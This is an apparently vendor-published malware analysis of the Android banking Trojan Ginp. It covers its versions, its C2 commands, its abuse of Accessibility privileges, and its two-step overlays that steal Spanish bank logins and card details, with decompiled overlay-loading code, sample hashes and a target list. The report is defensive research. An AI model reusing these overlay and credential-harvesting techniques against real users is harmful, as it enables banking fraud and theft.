background

Ginp - A malware patchwork borrowing from Anubis

Nov, 2019


Card

Intro

ThreatFabric analysts have recently investigated an interesting new strain of banking malware. The malware was first spotted by Tatyana Shishkova from Kaspersky by end October 2019, but actually dates back to June 2019. It is still under active development, with at least 5 different versions of the Trojan released within the last 5 months (June - November 2019).

What makes Ginp stand out is that it was built from scratch being expanded through regular updates, the last of which including code copied from the infamous Anubis banking Trojan, indicating that its author is cherry-picking the most relevant functionality for its malware. In addition, its original target list is extremely narrow and seems to be focused on Spanish banks. Last but not least, all the overlay screens (injects) for the banks include two steps; first stealing the victim's login credentials, then their credit card details. Although multi-step overlays are not something new, their usage is generally limited to avoid raising suspicion.

Evolution

The initial version of the malware dates back to early June 2019, masquerading as a "Google Play Verificator" app. At that time, Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server.

A couple of months later, in August 2019, a new version was released with additional banking-specific features. This and following versions were masquerading as fake “Adobe Flash Player” apps. The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service. The overlay consisted of a generic credit card grabber targeting social and utility apps, such as Google Play, Facebook, WhatsApp, Chrome, Skype, Instagram and Twitter.

Although early versions had some basic code and string obfuscation, protection of the third version of the malware was enhanced with the use of payload obfuscation. The capabilities remained unchanged, but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays (banking apps) separately. In addition, the credit card grabber target list was expanded with Snapchat and Viber.

In the third version spotted in the wild, the author introduced parts of the source code of the infamous Anubis Trojan (which was leaked earlier in 2019). This change came hand in hand with a new overlay target list, no longer targeting social apps, but focusing on banking instead. A remarkable fact is that all the targeted apps relate to Spanish banks, including targets never seen before in any other Android banking Trojan. The 24 target apps belong to 7 different Spanish banks: Caixa bank, Bankinter, Bankia, BBVA, EVO Banco, Kutxabank and Santander. The specific apps can be found in the target list in the appendix.

The most recent version of Ginp (at the time of writing) was detected at the end of November 2019. This version has some small modifications which seems to be unused, as the malware behaviour is the same as the previous version. The author has introduced the capability to grant the app the device admin permission. Additionally new endpoint was added that seems related to downloading a module for the malware, probably with new features or configuration.

How it works

When the malware is first started on the device it will begin by removing its icon from the app drawer, hiding from the end user. In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot:

Ginp Accessibility request

Once the user grants the requested Accessibility Service privilege, Ginp starts by granting itself additional permissions, such as (dynamic) permissions required in order to be able to send messages and make calls, without requiring any further action from the victim. When done, the bot is functional and ready to receive commands and perform overlay attacks.

The commands supported by the most recent version of the bot are listed below. As can be observed, the possibilities offered by the bot are pretty common.

Command

Description

SEND_SMS Send an SMS from the bot to a specific number
NEW_URL Update the C2 URL
KILL Disable the bot
PING_DELAY Update interval between each ping request
CLEAN_IGNORE_PKG Empty list of overlayed apps
WRITE_INJECTS Update target list
READ_INJECTS Get current target list
START_ADMIN Request Device Admin privileges
ALL_SMS Get all SMS messages
DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service
ENABLE_ACCESSIBILITY Prevent user from disabling the accessibility service
ENABLE_HIDDEN_SMS Set malware as default SMS app
DISABLE_HIDDEN_SMS Remove malware as default SMS app
ENABLE_EXTENDED_INJECT Enable overlay attacks
DISABLE_EXTENDED_INJECT Disable overlay attacks
ENABLE_CC_GRABBER Enable the Google Play overlay
DISABLE_CC_GRABBER Disable the Google Play overlay
START_DEBUG Enable debugging
GET_LOGCAT Get logs from the device
STOP_DEBUG Disable debugging
GET_APPS Get installed applications
GET_CONTACTS Get contacts
SEND_BULK_SMS Send SMS to multiple numbers
UPDATE_APK Not implemented
INJECT_PACKAGE Add new overlay target
CALL_FORWARD Enable/disable call forwarding
START_PERMISSIONS Starts request for additional permissions(Accessibility privileges, battery optimizations bypass, dynamic permissions)

Features

The most recent version of Ginp has the same capabilities as most other Android banking Trojans, such as the use of overlay attacks, SMS control and contact list harvesting. Overall, it has a fairly common feature list, but it is expected to expand in future updates. Since Ginp is already using some code from the Anubis Trojan, it is quite likely that other, more advanced features from Anubis or other malware, such as a back-connect proxy, screen-streaming and RAT will also be added in the future.

Ginp embeds the following set of features, allowing it to remain under the radar and successfully perform attacks:

  • Overlaying: Dynamic (local overlays obtained from the C2)
  • SMS harvesting: SMS listing
  • SMS harvesting: SMS forwarding
  • Contact list collection
  • Application listing
  • Overlaying: Targets list update
  • SMS: Sending
  • Calls: Call forwarding
  • C2 Resilience: Auxiliary C2 list
  • Self-protection: Hiding the App icon
  • Self-protection: Preventing removal
  • Self-protection: Emulation-detection

Overlay attack

Ginp uses the Accessibility Service to check which application runs is the foreground. If the package name of the foreground app is included in the target list, an overlay is shown. The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot.

The following code snippet shows how the WebView is created.

                            protected void onCreate(Bundle arg6) {
    super.onCreate(arg6);
    this.packageName = this.getIntent().getStringExtra("packageName");
    this.mContext = this;
    String v6 = this.store.get(this, "INJ_URL");
    Utils v0 = this.Tools;
    v0.Log(this, "[Injector] Starting injection on " + this.packageName, Boolean.valueOf(true));
    WebView v0_1 = new WebView(this);
    v0_1.getSettings().setJavaScriptEnabled(true);
    v0_1.setScrollBarStyle(0);
    v0_1.setWebViewClient(new MyWebViewClient(this, null));
    v0_1.setWebChromeClient(new MyWebChromeClient(this, null));
    String v1_1 = Resources.getSystem().getConfiguration().locale.getCountry();
    String v2 = Resources.getSystem().getConfiguration().locale.getLanguage();
    v0_1.loadUrl(v6 + "?package=" + this.packageName + "&device_id=" + this.store.get(this, "ANDROID_ID") + "&country=" + v1_1.toLowerCase() + "&lang=" + v2.toLowerCase());
    this.setContentView(v0_1);
}

Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps, first stealing the victim's login credentials, then stealing the credit card details (to "validate" the user identity), as shown in the screenshots hereafter:

Santander Ginp overlays

The following code snippet shows that after the second overlay is filled-in and validated, it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks.

                            public void onPageFinished(WebView arg3, String arg4) {
    if(arg4.contains("|DONE|")) {
        Utils v3 = ActivityInjection.this.Tools;
        Context v4 = ActivityInjection.this.mContext;
        v3.Log(v4, "[Injector] Grabbing on " + ActivityInjection.this.packageName + " completed.", Boolean.valueOf(true));
        ActivityInjection.this.Tools.addPackageToIgnore(ActivityInjection.this.mContext, ActivityInjection.this.packageName);
        ActivityInjection.this.finish();
    }
}

Targets

The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications. Still included in the last versions, this screen is only used to overlay the official Google Play Store app. More apps could be added to the grabber target list in the future, such as the ones that were targeted in older versions:

  • Facebook
  • WhatsApp
  • Skype
  • Twitter
  • Chrome
  • Instagram
  • Snapchat
  • Viber

The following screenshot shows the generic card grabber overlay screen:

Ginp generic grabber

The current active target list is available in the appendix, containing a total of 24 unique targets. The following screenshots show what type of information is collected in both steps of the overlay attack:

Ginp overlays
Ginp overlays
Ginp overlays
Ginp overlays

Based on Anubis

Once the Anubis bot code got leaked, it was just a matter of time before new banking Trojans based on Anubis would surface. When analyzing the Ginp’s recent samples, ThreatFabric analysts found some similarities with the famous Android banking Trojan. Based on the evolution of Ginp it is clear that it isn’t based on Anubis, but rather reuses some of its code. Below are some of the elements showing the relation.

The names used for Android components are similar:

Similarities with Anubis
Similarities with Anubis

When analyzing these components, similarities were found in the code of both malware families:

Similarities with Anubis

Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values. Previous versions were storing config values within the variables of a class, while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis:

  • isAccessibility
  • time_work
  • time_start_permission
  • url_inj

Conclusion

Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information. In a 5-month timespan, actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging, back-connect proxy or RAT capabilities.

Ginp’s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank. The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language.

Although the current target list is limited to Spanish apps, it seems that the actor is taking into account that the bot should also be able to target other countries, seeing that the path used in the inject requests contains the country code of the targeted institution. This could indicate that actor already has plans in expanding the targets to applications from different countries and regions.

Mobile Threat Intelligence

Our Mobile Threat Intelligence (MTI) solution provides a strategic and contextual overview of the threat-landscape, as well as in-depth tactical information to make the intelligence actionable.

MTI prevents financially motivated threat actors from being successful.

Client Side Detection

Our Client Side Detection (CSD) solution provides a real-time risk overview of the Web and Mobile channels, by detecting known and unknown threats.

By doing so, CSD enables immediate, automated and scalable online fraud prevention and risk remediation.

Appendix

Samples

Some of the latest Ginp samples found in the wild:

App name

Package name

SHA-256 hash

Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5
Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7
Adobe Flash Player ethics.unknown.during 5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f
Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea
Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c
Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212

Target list

The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below. This list is expected to grow in the future.

Package name

Application name

com.android.vending Play Store
es.lacaixa.hceicon2 CaixaBank Pay: Mobile Payments 
es.lacaixa.mobile.android.newwapicon CaixaBank
es.caixabank.caixabanksign CaixaBank Sign - Digital Coordinate Card
es.caixabank.mobile.android.tablet CaixaBank Tablet
com.imaginbank.app imaginBank - Your mobile bank
es.lacaixa.app.multiestrella Family
com.bankinter.launcher Bankinter Móvil
com.bankinter.bkwallet Bankinter Wallet
com.bankinter.coincwallet COINC Wallet
com.bankinter.bankintercard bankintercard
es.cm.android Bankia
com.bankia.wallet Bankia Wallet
es.cm.android.tablet Bankia Tablet
com.bbva.bbvacontigo BBVA Spain
com.bbva.netcash BBVA Net Cash | ES & PT
es.evobanco.bancamovil EVO Banco móvil
com.redsys.bizum EVO Bizum
com.kutxabank.android Kutxabank
es.redsys.walletmb.app.kutxa.pro KutxabankPay
es.bancosantander.apps Santander
es.banconsantander.app.tablet Santander Tablet
es.bancosantander.android.confirming Confirming Santander
com.tm.sanstp Santander Cash Nexus
background

Request for information

Interested? We are happy to tell you more.